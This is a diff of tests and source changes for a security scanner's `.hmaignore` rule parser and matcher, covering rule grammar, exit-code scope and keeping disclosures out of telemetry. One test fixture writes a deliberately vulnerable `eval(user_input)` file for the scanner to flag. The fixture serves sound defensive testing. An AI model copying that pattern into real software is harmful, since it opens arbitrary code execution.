+  // matched case-insensitively, stored UPPER-CASED
+  { row: 'danger.py:nemo-009 # r', channel: 'hmaignore-path-check', path: 'danger.py', checkId: 'NEMO-009', reason: 'r' },
+  { row: 'skills/aria-trap/SKILL.md:AST-CRED-001 # canary telemetry', channel: 'hmaignore-path-check', path: 'skills/aria-trap/SKILL.md', checkId: 'AST-CRED-001', reason: 'canary telemetry' },
+  // the CA's row, now true (the star expression is separate from the id expression)
+  { row: 'SKILL.md:SKILL-* # r', channel: 'hmaignore-path-check', path: 'SKILL.md', checkId: 'SKILL-*', reason: 'r' },
+  { row: 'SKILL.md:SKILL-0* # r', channel: 'hmaignore-path-check', path: 'SKILL.md', checkId: 'SKILL-0*', reason: 'r' },
+  { row: 'SKILL.md:*-001 # r', channel: 'hmaignore-path-check', path: 'SKILL.md', checkId: '*-001', reason: 'r' },
+  // disclosed as such; CPO pre-mortem 1
+  { row: 'weird:bar-baz # r', channel: 'hmaignore-path-check', path: 'weird', checkId: 'BAR-BAZ', reason: 'r' },
+  { row: '!NEMO-009', channel: 'hmaignore-check', checkId: 'NEMO-009' },
+  { row: '!nemo-009', channel: 'hmaignore-check', checkId: 'NEMO-009' },
+  { row: '!NEMO-0*', channel: 'hmaignore-check', checkId: 'NEMO-0*' },
+  { row: '!*-009', channel: 'hmaignore-check', checkId: '*-009' },
+  // `!*` stays legal: presentational, matches at least one check
+  { row: '!*', channel: 'hmaignore-check', checkId: '*' },
+  { row: '!NEMO-009 # r', channel: 'hmaignore-check', checkId: 'NEMO-009', reason: 'r' },
+  // the attribute token is case-insensitive
+  { row: '!NEMO-009 EXPIRES:2099-12-31', channel: 'hmaignore-check', checkId: 'NEMO-009', expires: '2099-12-31' },
+  // expires on the named day is ACTIVE (inclusive): today <= date
+  { row: `danger.py:NEMO-009 expires:${TODAY} # r`, channel: 'hmaignore-path-check', path: 'danger.py', checkId: 'NEMO-009', reason: 'r', expires: TODAY },
+];
+
+/** Rows step (a) skips outright — neither a rule nor an error. */
+const SKIPPED: Array<{ label: string; row: string }> = [
+  { label: 'a whole-line comment', row: '# comment' },
+  { label: 'a blank line', row: '' },
+  { label: 'a whitespace-only line', row: '   ' },
+  { label: 'a BOM before the first rule', row: '\uFEFF' + 'danger.py' },
+];
+
+/** REJECT rows — each an errors[] entry with its content, and the line is inert. */
+const REJECT: Array<{ row: string; error: RegExp }> = [
+  { row: 'SKILL.md:*', error: /write `SKILL\.md`/ },
+  { row: 'SKILL.md:*-*', error: /write `SKILL\.md`/ },
+  { row: 'danger.py:NEMO-009', error: /requires a reason/ },
+  { row: 'danger.py:NEMO-009 #', error: /requires a reason/ },
+  { row: 'weird:bar-baz', error: /requires a reason/ },
+  { row: '*.py', error: /globs are not supported in path rules/ },
+  { row: 'dan*', error: /globs are not supported in path rules/ },
+  { row: 'src/*:NEMO-009 # r', error: /globs are not supported in path rules/ },
+  { row: ':NEMO-009 # r', error: /empty path/ },
+  { row: '!', error: /empty check pattern/ },
+  { row: '!NEMO', error: /not a check pattern/ },
+  { row: '!name.py', error: /not a check pattern/ },
+  { row: '!NEMO-009 extra', error: /not a check pattern/ },
+  { row: 'SKILL.md:SK!LL-* # r', error: /malformed check pattern/ },
+  { row: 'expires:2026-13-45', error: /not a valid date/ },
+  { row: 'expires:', error: /not a valid date/ },
+  { row: 'expires:2026-1-5', error: /not a valid date/ },
+  { row: 'expires:2026-02-30', error: /not a valid date/ },
+  { row: 'expires:2099-12-31 danger.py', error: /`expires:` must follow the rule/ },
+  { row: 'danger.py expires:2099-12-31 expires:2099-12-31', error: /two `expires:`/ },
+  // with T = 2026-09-01, a 2026-08-31 expiry has lapsed: the line is inert
+  // and loud, and its findings return to the report
+  { row: 'danger.py:NEMO-009 expires:2026-08-31 # r', error: /expired on 2026-08-31/ },
+];
+
+describe('HMA-21.AC1 — the 47-row reconciliation table (today = 2026-09-01)', () => {
+  it('HMA-21.AC1 carries the 47 rows', () => {
+    expect(ACCEPT.length + SKIPPED.length + REJECT.length).toBe(47);
+  });
+
+  for (const a of ACCEPT) {
+    it(`HMA-21.AC1 ACCEPT ${JSON.stringify(a.row)} → ${a.channel}`, () => {
+      const { rules, errors } = parseHmaIgnore(a.row, TODAY);
+      expect(errors).toEqual([]);
+      expect(rules).toHaveLength(1);
+      const r = rules[0];
+      expect(r.line).toBe(1);
+      expect(r.rule).toBe(a.row.trim());
+      expect(r.channel).toBe(a.channel);
+      expect(r.path).toBe(a.path);
+      expect(r.checkId).toBe(a.checkId);
+      expect(r.reason).toBe(a.reason);
+      expect(r.expires).toBe(a.expires);
+    });
+  }
+
+  for (const s of SKIPPED) {
+    it(`HMA-21.AC1 SKIP ${s.label}`, () => {
+      const { rules, errors } = parseHmaIgnore(s.row, TODAY);
+      expect(errors).toEqual([]);
+      if (s.row.includes('danger.py')) {
+        // the BOM row still parses the rule under it, path `danger.py`
+        expect(rules).toEqual([
+          { line: 1, rule: 'danger.py', channel: 'hmaignore-path', path: 'danger.py' },
+        ]);
+      } else {
+        expect(rules).toEqual([]);
+      }
+    });
+  }
+
+  for (const rej of REJECT) {
+    it(`HMA-21.AC1 REJECT ${JSON.stringify(rej.row)} → ${rej.error}`, () => {
+      const { rules, errors } = parseHmaIgnore(rej.row, TODAY);
+      // the line is inert: an error, never a rule, never a silent fallback
+      expect(rules).toEqual([]);
+      expect(errors).toHaveLength(1);
+      expect(errors[0].line).toBe(1);
+      expect(errors[0].rule).toBe(rej.row.trim());
+      expect(errors[0].error).toMatch(rej.error);
+    });
+  }
+
+  it('HMA-21.AC1 errors carry their 1-based line in a multi-line file', () => {
+    const content = REJECT.map((r) => r.row).join('\n');
+    const { rules, errors } = parseHmaIgnore(content, TODAY);
+    expect(rules).toEqual([]);
+    expect(errors.map((e) => e.line)).toEqual(REJECT.map((_, i) => i + 1));
+  });
+
+  it('HMA-21.AC1 accepted rows keep their 1-based line in a multi-line file', () => {
+    const content = ['# header', ...ACCEPT.map((a) => a.row)].join('\n');
+    const { rules, errors } = parseHmaIgnore(content, TODAY);
+    expect(errors).toEqual([]);
+    expect(rules.map((r) => r.line)).toEqual(ACCEPT.map((_, i) => i + 2));
+  });
+});

--- a/__tests__/hardening/hmaignore-path-check-scope.test.ts
+++ b/__tests__/hardening/hmaignore-path-check-scope.test.ts
@@ -1,5 +1,5 @@
 /**
- * HMA-21.AC2 — scope semantics reach the exit code (CA (2), CPO §3).
+ * HMA-21.AC2 — scope semantics reach the exit code.
  *
  * Fixture: `danger.py` = `eval(user_input)`, neutral HOME,
  * `node dist/cli.js secure --ci --json .`. Measured at base a598f616:

--- a/__tests__/hardening/hmaignore-path-check-scope.test.ts
+++ b/__tests__/hardening/hmaignore-path-check-scope.test.ts
@@ -1,0 +1,120 @@
+/**
+ * HMA-21.AC2 — scope semantics reach the exit code (CA (2), CPO §3).
+ *
+ * Fixture: `danger.py` = `eval(user_input)`, neutral HOME,
+ * `node dist/cli.js secure --ci --json .`. Measured at base a598f616:
+ *
+ *   no file                 -> exit 1 / score 69 / NEMO-009 reported
+ *   danger.py:NEMO-009 # r  -> IDENTICAL to none (silently inert)
+ *   !NEMO-009               -> exit 1 / 69 / suppressed (presentational)
+ *   danger.py               -> exit 0 / 93 / outOfScope
+ *
+ * At the fix the `<path>:<CHECK>` row moves: exit 0 / score 93 / the finding
+ * in `outOfScope` with `suppressedBy: "hmaignore-path-check"`, absent from
+ * `suppressed`, absent from the gate set. The other three rows are unchanged.
+ * Exit codes are captured from `spawnSync` status — no pipe.
+ */
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import { spawnSync } from 'node:child_process';
+import * as fs from 'node:fs';
+import * as os from 'node:os';
+import * as path from 'node:path';
+import { assertDistFreshIfPresent, BUILT_CLI as CLI } from '../helpers/dist-freshness';
+
+beforeAll(assertDistFreshIfPresent);
+
+let fixture: string;
+let home: string;
+
+beforeAll(() => {
+  fixture = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-scope-'));
+  fs.writeFileSync(path.join(fixture, 'danger.py'), 'eval(user_input)\n');
+  home = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-home-'));
+});
+
+afterAll(() => {
+  for (const d of [fixture, home]) {
+    try { fs.rmSync(d, { recursive: true, force: true }); } catch { /* best effort */ }
+  }
+});
+
+function secure(hmaignore?: string): { status: number | null; json: any } {
+  if (hmaignore === undefined) {
+    fs.rmSync(path.join(fixture, '.hmaignore'), { force: true });
+  } else {
+    fs.writeFileSync(path.join(fixture, '.hmaignore'), hmaignore);
+  }
+  const r = spawnSync(process.execPath, [CLI, 'secure', '--ci', '--json', '.'], {
+    cwd: fixture,
+    encoding: 'utf8',
+    timeout: 240_000,
+    maxBuffer: 64 * 1024 * 1024,
+    env: { ...process.env, NO_COLOR: '1', OPENA2A_TELEMETRY: 'off', HOME: home },
+  });
+  const out = r.stdout ?? '';
+  return { status: r.status, json: JSON.parse(out.slice(out.indexOf('{'))) };
+}
+
+const failing = (j: any) => (j.findings ?? []).filter((f: any) => f.passed === false).map((f: any) => f.checkId);
+
+describe('HMA-21.AC2 — <path>:<CHECK-ID> scope semantics', { timeout: 600_000 }, () => {
+  it('HMA-21.AC2 baseline: no .hmaignore -> exit 1 / 69 / NEMO-009 reported', () => {
+    const { status, json } = secure();
+    expect(status).toBe(1);
+    expect(json.score).toBe(69);
+    expect(failing(json)).toContain('NEMO-009');
+    expect(json.suppressed).toBeUndefined();
+    expect(json.outOfScope).toBeUndefined();
+  });
+
+  it('HMA-21.AC2 danger.py:NEMO-009 # r -> exit 0 / 93 / outOfScope via hmaignore-path-check, not suppressed, not in the gate set', () => {
+    const { status, json } = secure('danger.py:NEMO-009 # r\n');
+    expect(status).toBe(0);
+    expect(json.exitCode).toBe(0);
+    expect(json.score).toBe(93);
+    expect(failing(json)).not.toContain('NEMO-009');
+    const oos = (json.outOfScope ?? []).find((r: any) => r.checkId === 'NEMO-009');
+    expect(oos).toBeDefined();
+    expect(oos.suppressedBy).toBe('hmaignore-path-check');
+    // absent from `suppressed`, so `gateSet()` cannot expand it back into the
+    // exit code — the counts prove the gate set does not hold the critical
+    expect((json.suppressed ?? []).map((r: any) => r.checkId)).not.toContain('NEMO-009');
+    expect(json.counts.critical).toBe(0);
+  });
+
+  it('HMA-21.AC2 !NEMO-009 -> exit 1 / 69 / suppressed (presentational, unchanged)', () => {
+    const { status, json } = secure('!NEMO-009\n');
+    expect(status).toBe(1);
+    expect(json.score).toBe(69);
+    const sup = (json.suppressed ?? []).find((r: any) => r.checkId === 'NEMO-009');
+    expect(sup).toBeDefined();
+    expect(sup.suppressedBy).toBe('hmaignore-check');
+    expect(json.outOfScope).toBeUndefined();
+    // still counted: the presentational channel narrows the list, not the gate
+    expect(json.counts.critical).toBe(1);
+  });
+
+  it('HMA-21.AC2 danger.py -> exit 0 / 93 (whole-path scope, unchanged)', () => {
+    const { status, json } = secure('danger.py\n');
+    expect(status).toBe(0);
+    expect(json.score).toBe(93);
+    const oos = (json.outOfScope ?? []).find((r: any) => r.checkId === 'NEMO-009');
+    expect(oos).toBeDefined();
+    expect(oos.suppressedBy).toBe('hmaignore-path');
+  });
+
+  it('HMA-21.AC2 no site compares a channel literal for the partition — isScopeChannel routes it', () => {
+    const root = path.resolve(__dirname, '..', '..');
+    const sources = ['src/hardening/scanner.ts', 'src/cli.ts', 'src/hardening/settled-outcome.ts', 'src/ui/verdict-band.ts'];
+    for (const rel of sources) {
+      const src = fs.readFileSync(path.join(root, rel), 'utf8');
+      // a comparison against the scope-channel literals is the pattern that
+      // made a fourth channel fall through onto the `suppressed` side
+      expect(src, `${rel} compares a channel literal`).not.toMatch(/[!=]==?\s*'hmaignore-path'/);
+      expect(src, `${rel} compares a channel literal`).not.toMatch(/[!=]==?\s*'hmaignore-path-check'/);
+    }
+    // and the three partition sites actually route through the helper
+    expect(fs.readFileSync(path.join(root, 'src/hardening/scanner.ts'), 'utf8')).toMatch(/isScopeChannel/);
+    expect(fs.readFileSync(path.join(root, 'src/cli.ts'), 'utf8')).toMatch(/isScopeChannel/);
+  });
+});

--- a/__tests__/registry/hmaignore-never-on-wires.test.ts
+++ b/__tests__/registry/hmaignore-never-on-wires.test.ts
@@ -1,6 +1,6 @@
 /**
- * HMA-21.AC4 — the per-rule `.hmaignore` disclosure never rides a wire
- * (CA (3)). Same shape as `settled-outcome-wires.test.ts`: build a
+ * HMA-21.AC4 — the per-rule `.hmaignore` disclosure never rides a wire.
+ * Same shape as `settled-outcome-wires.test.ts`: build a
  * `ScanResult` that CARRIES the `hmaignore` key, run it through every
  * outbound builder, and assert `'hmaignore' in payload === false` on each.
  *

--- a/__tests__/registry/hmaignore-never-on-wires.test.ts
+++ b/__tests__/registry/hmaignore-never-on-wires.test.ts
@@ -1,0 +1,127 @@
+/**
+ * HMA-21.AC4 — the per-rule `.hmaignore` disclosure never rides a wire
+ * (CA (3)). Same shape as `settled-outcome-wires.test.ts`: build a
+ * `ScanResult` that CARRIES the `hmaignore` key, run it through every
+ * outbound builder, and assert `'hmaignore' in payload === false` on each.
+ *
+ * The disclosure necessarily carries paths and free-text reasons; the
+ * settled record carries no path by construction, and `.hmaignore` reasons
+ * are repository-local policy text with no Registry reader.
+ */
+import { describe, it, expect } from 'vitest';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import { settledOutcome, SETTLED_OUTCOME_KEYS, type SettledOutcome } from '../../src/hardening/settled-outcome';
+import { buildPublishPayload } from '../../src/registry/publish';
+import { buildScanReport, buildCommunityReport } from '../../src/registry/client';
+import { buildScanEvent } from '../../src/telemetry/contribute';
+import { emitFindings } from '../../src/hardening/finding-emit';
+import { isScopeChannel, type ScopeChannel, type PresentationalChannel, type SuppressionChannel } from '../../src/hardening/security-check';
+import type { ScanResult } from '../../src/hardening/security-check';
+
+// ── Compile-level guard: `hmaignore` is not a key of `SettledOutcome`. ──────
+// Under `tsc` this line stops compiling the day someone adds the field "for
+// completeness"; the runtime assertions below catch the same drift in CI.
+type HmaignoreNeverAKeyOfSettledOutcome = 'hmaignore' extends keyof SettledOutcome ? never : true;
+const _wireGuard: HmaignoreNeverAKeyOfSettledOutcome = true;
+void _wireGuard;
+
+function draft(checkId: string, severity: string, passed: boolean) {
+  return {
+    checkId,
+    name: checkId,
+    description: `fixture ${checkId}`,
+    category: 'config',
+    severity: severity as any,
+    passed,
+    message: 'x',
+    fixable: false,
+  };
+}
+
+const hmaignore: NonNullable<ScanResult['hmaignore']> = {
+  file: '.hmaignore',
+  rules: [
+    { line: 1, rule: 'danger.py:NEMO-009 # fp', channel: 'hmaignore-path-check', path: 'danger.py', checkId: 'NEMO-009', reason: 'fp', matched: 1 },
+  ],
+  errors: [{ line: 2, rule: '*.py', error: 'globs are not supported in path rules' }],
+};
+
+function makeResult(): ScanResult {
+  return {
+    timestamp: new Date(),
+    platform: 'test',
+    projectType: 'library',
+    findings: emitFindings([draft('ENV-001', 'high', false)]),
+    score: 61,
+    maxScore: 100,
+    outOfScope: [{ checkId: 'NEMO-009', name: 'x', category: 'nemo', severity: 'critical', count: 1, suppressedBy: 'hmaignore-path-check' }],
+    hmaignore,
+    coverage: {
+      filesExamined: 3,
+      executions: [{ method: 'a', prefixes: [], completed: true, filesRead: 3, pathsInspected: 3 }],
+      truncations: [],
+      unreadableInputs: { count: 0, codes: {}, directories: 0 },
+    },
+  } as unknown as ScanResult;
+}
+
+describe('HMA-21.AC4 — hmaignore never on a wire', () => {
+  const r = makeResult();
+  const settled = settledOutcome(r, 1);
+
+  it('HMA-21.AC4 settled-outcome.ts: the record excludes it, and SETTLED_OUTCOME_KEYS cannot pick it up', () => {
+    expect('hmaignore' in settled).toBe(false);
+    expect(SETTLED_OUTCOME_KEYS as readonly string[]).not.toContain('hmaignore');
+    // the scope rows themselves still ride (additive value in an open field)
+    expect(settled.outOfScope?.[0]?.suppressedBy).toBe('hmaignore-path-check');
+  });
+
+  it('HMA-21.AC4 publish.ts: buildPublishPayload carries no hmaignore', () => {
+    const p = buildPublishPayload(
+      { packageName: 'fx', directory: '/tmp/fx', hardeningFindings: r.findings } as any,
+      '0.33.0',
+      settled,
+    );
+    expect('hmaignore' in p).toBe(false);
+  });
+
+  it('HMA-21.AC4 registry/client.ts: buildScanReport and buildCommunityReport carry no hmaignore, in rawReport included', () => {
+    const scan = buildScanReport('v-1', r.findings as any, settled);
+    expect('hmaignore' in scan).toBe(false);
+    expect('hmaignore' in (scan.rawReport as object)).toBe(false);
+    expect('hmaignore' in ((scan.rawReport as any).settledOutcome ?? {})).toBe(false);
+    const community = buildCommunityReport('fx', r.findings as any, {}, settled);
+    expect('hmaignore' in community).toBe(false);
+    expect('hmaignore' in (community.rawReport as object)).toBe(false);
+  });
+
+  it('HMA-21.AC4 telemetry/contribute.ts: buildScanEvent carries no hmaignore', () => {
+    const event = buildScanEvent('fx', '/tmp/fx-none', r.findings as any, 900, settled, 1);
+    expect('hmaignore' in event).toBe(false);
+    expect('hmaignore' in (event.scanSummary as object)).toBe(false);
+  });
+
+  it('HMA-21.AC4 cli.ts publish arm: the ci rawReport is built from named keys and never references hmaignore', () => {
+    const cliSrc = fs.readFileSync(path.resolve(__dirname, '..', '..', 'src', 'cli.ts'), 'utf8');
+    const arm = cliSrc.match(/submitCIScanResult\(\{[\s\S]*?\}\);/);
+    expect(arm, 'the ci publish arm moved — re-point this guard').not.toBeNull();
+    expect(arm![0]).not.toContain('hmaignore');
+    // and no wire builder spreads ScanResult wholesale
+    expect(arm![0]).not.toMatch(/\.\.\.result\b/);
+  });
+
+  it('HMA-21.AC4 SuppressionChannel is split into PresentationalChannel | ScopeChannel with isScopeChannel exported', () => {
+    // type-level: assignability in both directions is what the split means
+    const scope: ScopeChannel = 'hmaignore-path-check';
+    const presentational: PresentationalChannel = 'hmaignore-check';
+    const union: SuppressionChannel[] = [scope, presentational, 'hmaignore-path', 'ignore-flag'];
+    expect(union).toHaveLength(4);
+    // value-level: the one spelling of the partition
+    expect(isScopeChannel('hmaignore-path')).toBe(true);
+    expect(isScopeChannel('hmaignore-path-check')).toBe(true);
+    expect(isScopeChannel('hmaignore-check')).toBe(false);
+    expect(isScopeChannel('ignore-flag')).toBe(false);
+    expect(isScopeChannel('some-future-channel')).toBe(false);
+  });
+});

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -2529,7 +2529,7 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
       const labelPad = 'Ignore file'.padEnd(LABEL_WIDTH, ' ');
       const first = hmaErrorRows[0];
       const renderError = (e: { line: number; rule: string; error: string }) =>
-        `.hmaignore:${e.line}: ${e.error}${e.rule ? ` — \`${escapeForDisplay(e.rule)}\`` : ''}`;
+        `.hmaignore:${e.line}: ${e.rule ? `\`${escapeForDisplay(e.rule)}\`: ` : ''}${e.error}`;
       console.log(
         `  ${colors.dim}${labelPad}${RESET()}${colors.yellow}${renderError(first)}${RESET()}`,
       );
@@ -2538,11 +2538,14 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
           `  ${colors.dim}${''.padEnd(LABEL_WIDTH, ' ')}${RESET()}${colors.yellow}${renderError(e)}${RESET()}`,
         );
       }
+      const inert = first.line === 0
+        ? 'The file is not applied, so anything it would have covered is still reported.'
+        : hmaErrorRows.length === 1
+          ? 'This line is not applied, so anything it would have covered is still reported.'
+          : 'These lines are not applied, so anything they would have covered is still reported.';
       console.log(
         `  ${colors.dim}${''.padEnd(LABEL_WIDTH, ' ')}` +
-        `${hmaErrorRows.length === 1 ? 'This line is' : 'These lines are'} not applied. ` +
-        `Errors never change the exit code; anything ` +
-        `${hmaErrorRows.length === 1 ? 'this line' : 'they'} would have covered is reported above.${RESET()}`,
+        `${inert} Errors never change the exit code.${RESET()}`,
       );
     }
 

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -306,6 +306,7 @@ import {
   type CategoryCoverage,
 } from './hardening/coverage-ledger';
 import type { ScanResult, SuppressionChannel, SecurityFindingDraft, WithheldLinkRecord } from './hardening/security-check';
+import { isScopeChannel } from './hardening/security-check';
 import { readStaysInsideTree } from './hardening/contain';
 import { mergeWithheldLinks, retargetInstruction, withheldLinkLines } from './hardening/withheld-links';
 
@@ -791,8 +792,11 @@ Examples:
         const unreadRecord = ledger.unreadableInputs;
         const unreadPaths = ledger.unreadablePaths();
 
-        // Apply .hmaignore filtering (paths + check IDs)
-        const { loadHmaIgnore: loadIgnore, isPathIgnored: pathIgnored, isCheckIgnored: checkIgnored, buildUnreadInputFinding, unsearchableAncestorSync } = await import('./hardening/scanner.js');
+        // Apply .hmaignore filtering through the scanner's ONE parser and ONE
+        // matcher (whole paths, `<path>:<CHECK>` narrowings, `!CHECK`
+        // patterns — case-insensitive ids, `*` anywhere), so `check` and
+        // `secure` read a committed file identically.
+        const { loadHmaIgnore: loadIgnore, matchHmaIgnore: matchIgnore, buildHmaIgnoreDisclosure: buildIgnoreDisclosure, buildUnreadInputFinding, unsearchableAncestorSync } = await import('./hardening/scanner.js');
         const skillIgnoreRules = await loadIgnore(targetDir);
         // #450 — one of the hand-rolled copies of the suppression rule. The
         // findings still LEAVE the reported set, exactly as before; what changes
@@ -814,27 +818,44 @@ Examples:
         }
         const skillSuppressedRaw: any[] = [];
         const skillOutOfScopeRaw: any[] = [];
-        if (skillIgnoreRules.paths.length > 0 || skillIgnoreRules.checkIds.length > 0) {
+        const skillAttribution = new Map<any, number>();
+        if (skillIgnoreRules.rules.length > 0) {
           for (const f of skillFindings as any[]) {
-            if (checkIgnored(f.checkId, skillIgnoreRules.checkIds)) {
-              skillSuppressedRaw.push({ ...f, suppressed: true, suppressedBy: 'hmaignore-check' });
-            } else if (f.checkId !== UNREAD_INPUT_CHECK_ID && f.file && pathIgnored(f.file, skillIgnoreRules.paths)) {
-              // The carve-out above mirrors `secure` exactly (see
-              // retainAfterPathSuppression in scanner.ts): a coverage
-              // statement is not a finding about a path's contents, so a path
-              // rule cannot scope it away — `outOfScope` renders as a bare
-              // count, and this arm's exit code was settled from the same
-              // record, so scoping the finding out would print "not in the
-              // exit code" about the very input holding the exit at 2. An
-              // explicit `!SCAN-UNREAD-001` check rule (the branch above)
-              // still suppresses it onto the Suppressed line, with the
-              // penalty, exactly as on `secure`.
-              skillOutOfScopeRaw.push({ ...f, suppressed: true, suppressedBy: 'hmaignore-path' });
-            }
+            // `matchHmaIgnore` holds the tier order (whole-path, then
+            // `<path>:<CHECK>`, then `!<CHECK>`) and the SCAN-UNREAD-001
+            // carve-out `secure` applies: a coverage statement is not a
+            // finding about a path's contents, so a path-shaped rule cannot
+            // scope it away — this arm's exit code was settled from the same
+            // record, so scoping the finding out would print "not in the exit
+            // code" about the very input holding the exit at 2. An explicit
+            // `!SCAN-UNREAD-001` check rule still suppresses it onto the
+            // Suppressed line, with the penalty, exactly as on `secure`.
+            const m = matchIgnore(f, skillIgnoreRules);
+            if (!m) continue;
+            const marked = { ...f, suppressed: true, suppressedBy: m.channel };
+            if (m.line !== undefined) skillAttribution.set(marked, m.line);
+            // The scope/presentational partition routes through
+            // `isScopeChannel`, never a channel literal: a scope channel
+            // leaves the risk band and the exit code, a presentational one
+            // narrows only the list.
+            if (isScopeChannel(m.channel)) skillOutOfScopeRaw.push(marked);
+            else skillSuppressedRaw.push(marked);
           }
         }
         const skillSuppressed = summarizeSuppressed(skillSuppressedRaw);
         const skillOutOfScope = summarizeSuppressed(skillOutOfScopeRaw);
+        // Per-rule match counts, over the same findings and through the same
+        // `countsAgainstScore` gate as the two Row summaries above, so
+        // Σ matched per (checkId, channel) equals the Row count.
+        const skillMatchedByLine = new Map<number, number>();
+        for (const f of [...skillSuppressedRaw, ...skillOutOfScopeRaw] as any[]) {
+          if (!countsAgainstScore(f)) continue;
+          const line = skillAttribution.get(f);
+          if (line !== undefined) skillMatchedByLine.set(line, (skillMatchedByLine.get(line) ?? 0) + 1);
+        }
+        // Present iff the target carries a `.hmaignore` (even one with no
+        // rules), absent otherwise — same key and presence rule as `secure`.
+        const skillHmaignore = buildIgnoreDisclosure(skillIgnoreRules, skillMatchedByLine);
         const withheld = new Set<string>([
           ...skillSuppressedRaw.map((f) => `${f.checkId}\u0000${f.file ?? ''}`),
           ...skillOutOfScopeRaw.map((f) => `${f.checkId}\u0000${f.file ?? ''}`),
@@ -921,6 +942,9 @@ Examples:
             details: issues,
             ...(skillSuppressed.length > 0 ? { suppressed: skillSuppressed } : {}),
             ...(skillOutOfScope.length > 0 ? { outOfScope: skillOutOfScope } : {}),
+            // Presence keyed on the FILE, not on the rules: an empty or
+            // all-error `.hmaignore` still discloses itself and its errors.
+            ...(skillHmaignore ? { hmaignore: skillHmaignore } : {}),
           });
           return;
         }
@@ -973,6 +997,7 @@ Examples:
           artifactSummaries: nmResult.artifactSummaries,
           suppressed: skillSuppressed.length > 0 ? skillSuppressed : undefined,
           outOfScope: skillOutOfScope.length > 0 ? skillOutOfScope : undefined,
+          hmaignore: skillHmaignore,
           verbose: !!options.verbose,
           usedAnalm: resolveNanomindFlag(options),
           analystFindings: nmResult.analystFindings,
@@ -1277,6 +1302,14 @@ interface UnifiedCheckDisplayOptions {
    * are already in the score. Top-level for the same reason as `outOfScope`.
    */
   suppressed?: ScanResult['suppressed'];
+  /**
+   * The per-rule `.hmaignore` disclosure. The renderer reads `errors[]` from
+   * it: every line the parser refused prints, by default, beside the
+   * `Scope`/`Suppressed` lines — the user believes the rule is active and it
+   * is not, which is the one silence this feature exists to remove. Errors
+   * NEVER change the exit code.
+   */
+  hmaignore?: ScanResult['hmaignore'];
   artifactSummaries?: Array<{
     path: string;
     type: string;
@@ -2481,6 +2514,35 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
         `Withheld from the list at your request. Still scored, still in the verdict, ` +
         `still in the exit code — ${worst.checkId} would have reported ` +
         `${worst.severity} ${worst.name}.${RESET()}`,
+      );
+    }
+
+    // Every `.hmaignore` line the parser refused — unparseable, malformed,
+    // lapsed, or the whole file unreadable (line 0). Loud BY DEFAULT, never
+    // behind --verbose: the user believes the rule is active and it is not.
+    // And exit-neutral, on every command and mode: an inert line hides
+    // nothing, so everything it would have covered is already in the score
+    // and the exit code — a syntax-based exit change would be a second gate
+    // with no finding behind it, whose fastest fix is deleting the line.
+    const hmaErrorRows = opts.hmaignore?.errors ?? [];
+    if (hmaErrorRows.length > 0) {
+      const labelPad = 'Ignore file'.padEnd(LABEL_WIDTH, ' ');
+      const first = hmaErrorRows[0];
+      const renderError = (e: { line: number; rule: string; error: string }) =>
+        `.hmaignore:${e.line}: ${e.error}${e.rule ? ` — \`${escapeForDisplay(e.rule)}\`` : ''}`;
+      console.log(
+        `  ${colors.dim}${labelPad}${RESET()}${colors.yellow}${renderError(first)}${RESET()}`,
+      );
+      for (const e of hmaErrorRows.slice(1)) {
+        console.log(
+          `  ${colors.dim}${''.padEnd(LABEL_WIDTH, ' ')}${RESET()}${colors.yellow}${renderError(e)}${RESET()}`,
+        );
+      }
+      console.log(
+        `  ${colors.dim}${''.padEnd(LABEL_WIDTH, ' ')}` +
+        `${hmaErrorRows.length === 1 ? 'This line is' : 'These lines are'} not applied. ` +
+        `Errors never change the exit code; anything ` +
+        `${hmaErrorRows.length === 1 ? 'this line' : 'they'} would have covered is reported above.${RESET()}`,
       );
     }
 
@@ -5166,6 +5228,12 @@ Examples:
         // array. Accumulating instead counted each suppressed finding twice and
         // printed `CONFIG-004 (critical x2)` for a single occurrence.
         result.suppressed = scanner.lastSuppressed.length > 0 ? scanner.lastSuppressed : undefined;
+        // The disclosure's `matched` counts are recounted by the same call
+        // over the same post-merge array as the two Row records above, so the
+        // Σ-matched cross-check holds on what `--json` finally carries.
+        // Presence rule unchanged: `lastHmaIgnore` is undefined exactly when
+        // the target has no `.hmaignore`.
+        result.hmaignore = scanner.lastHmaIgnore;
         if (result.allFindings) {
           // No cast. `reapplyIgnoreFilters` is generic over the finding type and
           // only marks and filters, so `refiltered` is still branded and assigns
@@ -6017,6 +6085,7 @@ Examples:
         // `.hmaignore` held back 65 findings, 26 of them critical.
         outOfScope: result.outOfScope,
         suppressed: result.suppressed,
+        hmaignore: result.hmaignore,
         localScan: {
           score: result.score,
           rawScore: result.rawScore,
@@ -6969,12 +7038,14 @@ Examples:
 
       // Re-apply .hmaignore filtering after NanoMind merge (paths + check IDs)
       try {
-        const { loadHmaIgnore: loadIgnore, isPathIgnored: pathIgnored, isCheckIgnored: checkIgnored } = await import('./hardening/scanner.js');
+        const { loadHmaIgnore: loadIgnore, matchHmaIgnore: matchIgnore } = await import('./hardening/scanner.js');
         const ncIgnoreRules = await loadIgnore(targetDir);
-        if (ncIgnoreRules.paths.length > 0 || ncIgnoreRules.checkIds.length > 0) {
-          mergedFindings = mergedFindings.filter((f: SecurityFinding) =>
-            !(f.file && pathIgnored(f.file, ncIgnoreRules.paths)) &&
-            !checkIgnored(f.checkId, ncIgnoreRules.checkIds));
+        if (ncIgnoreRules.rules.length > 0) {
+          // One parser, one matcher: whole paths, `<path>:<CHECK>` narrowings
+          // and `!CHECK` patterns all read the way `secure` reads them. This
+          // arm keeps its pre-existing behaviour of dropping the matched
+          // findings from its report outright.
+          mergedFindings = mergedFindings.filter((f: SecurityFinding) => !matchIgnore(f, ncIgnoreRules));
         }
       } catch { /* ignore filter unavailable */ }
 

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -1910,7 +1910,7 @@ export interface ParsedHmaIgnore {
 }
 
 /**
- * The two check-pattern expressions (CPO reconciliation §1(f)) — one grammar
+ * The two check-pattern expressions — one grammar
  * shared by `!<CHECK>` and `<path>:<CHECK>`. Matched case-insensitively;
  * matched ids are stored upper-cased, which is what the `secure` matcher has
  * always done at runtime.
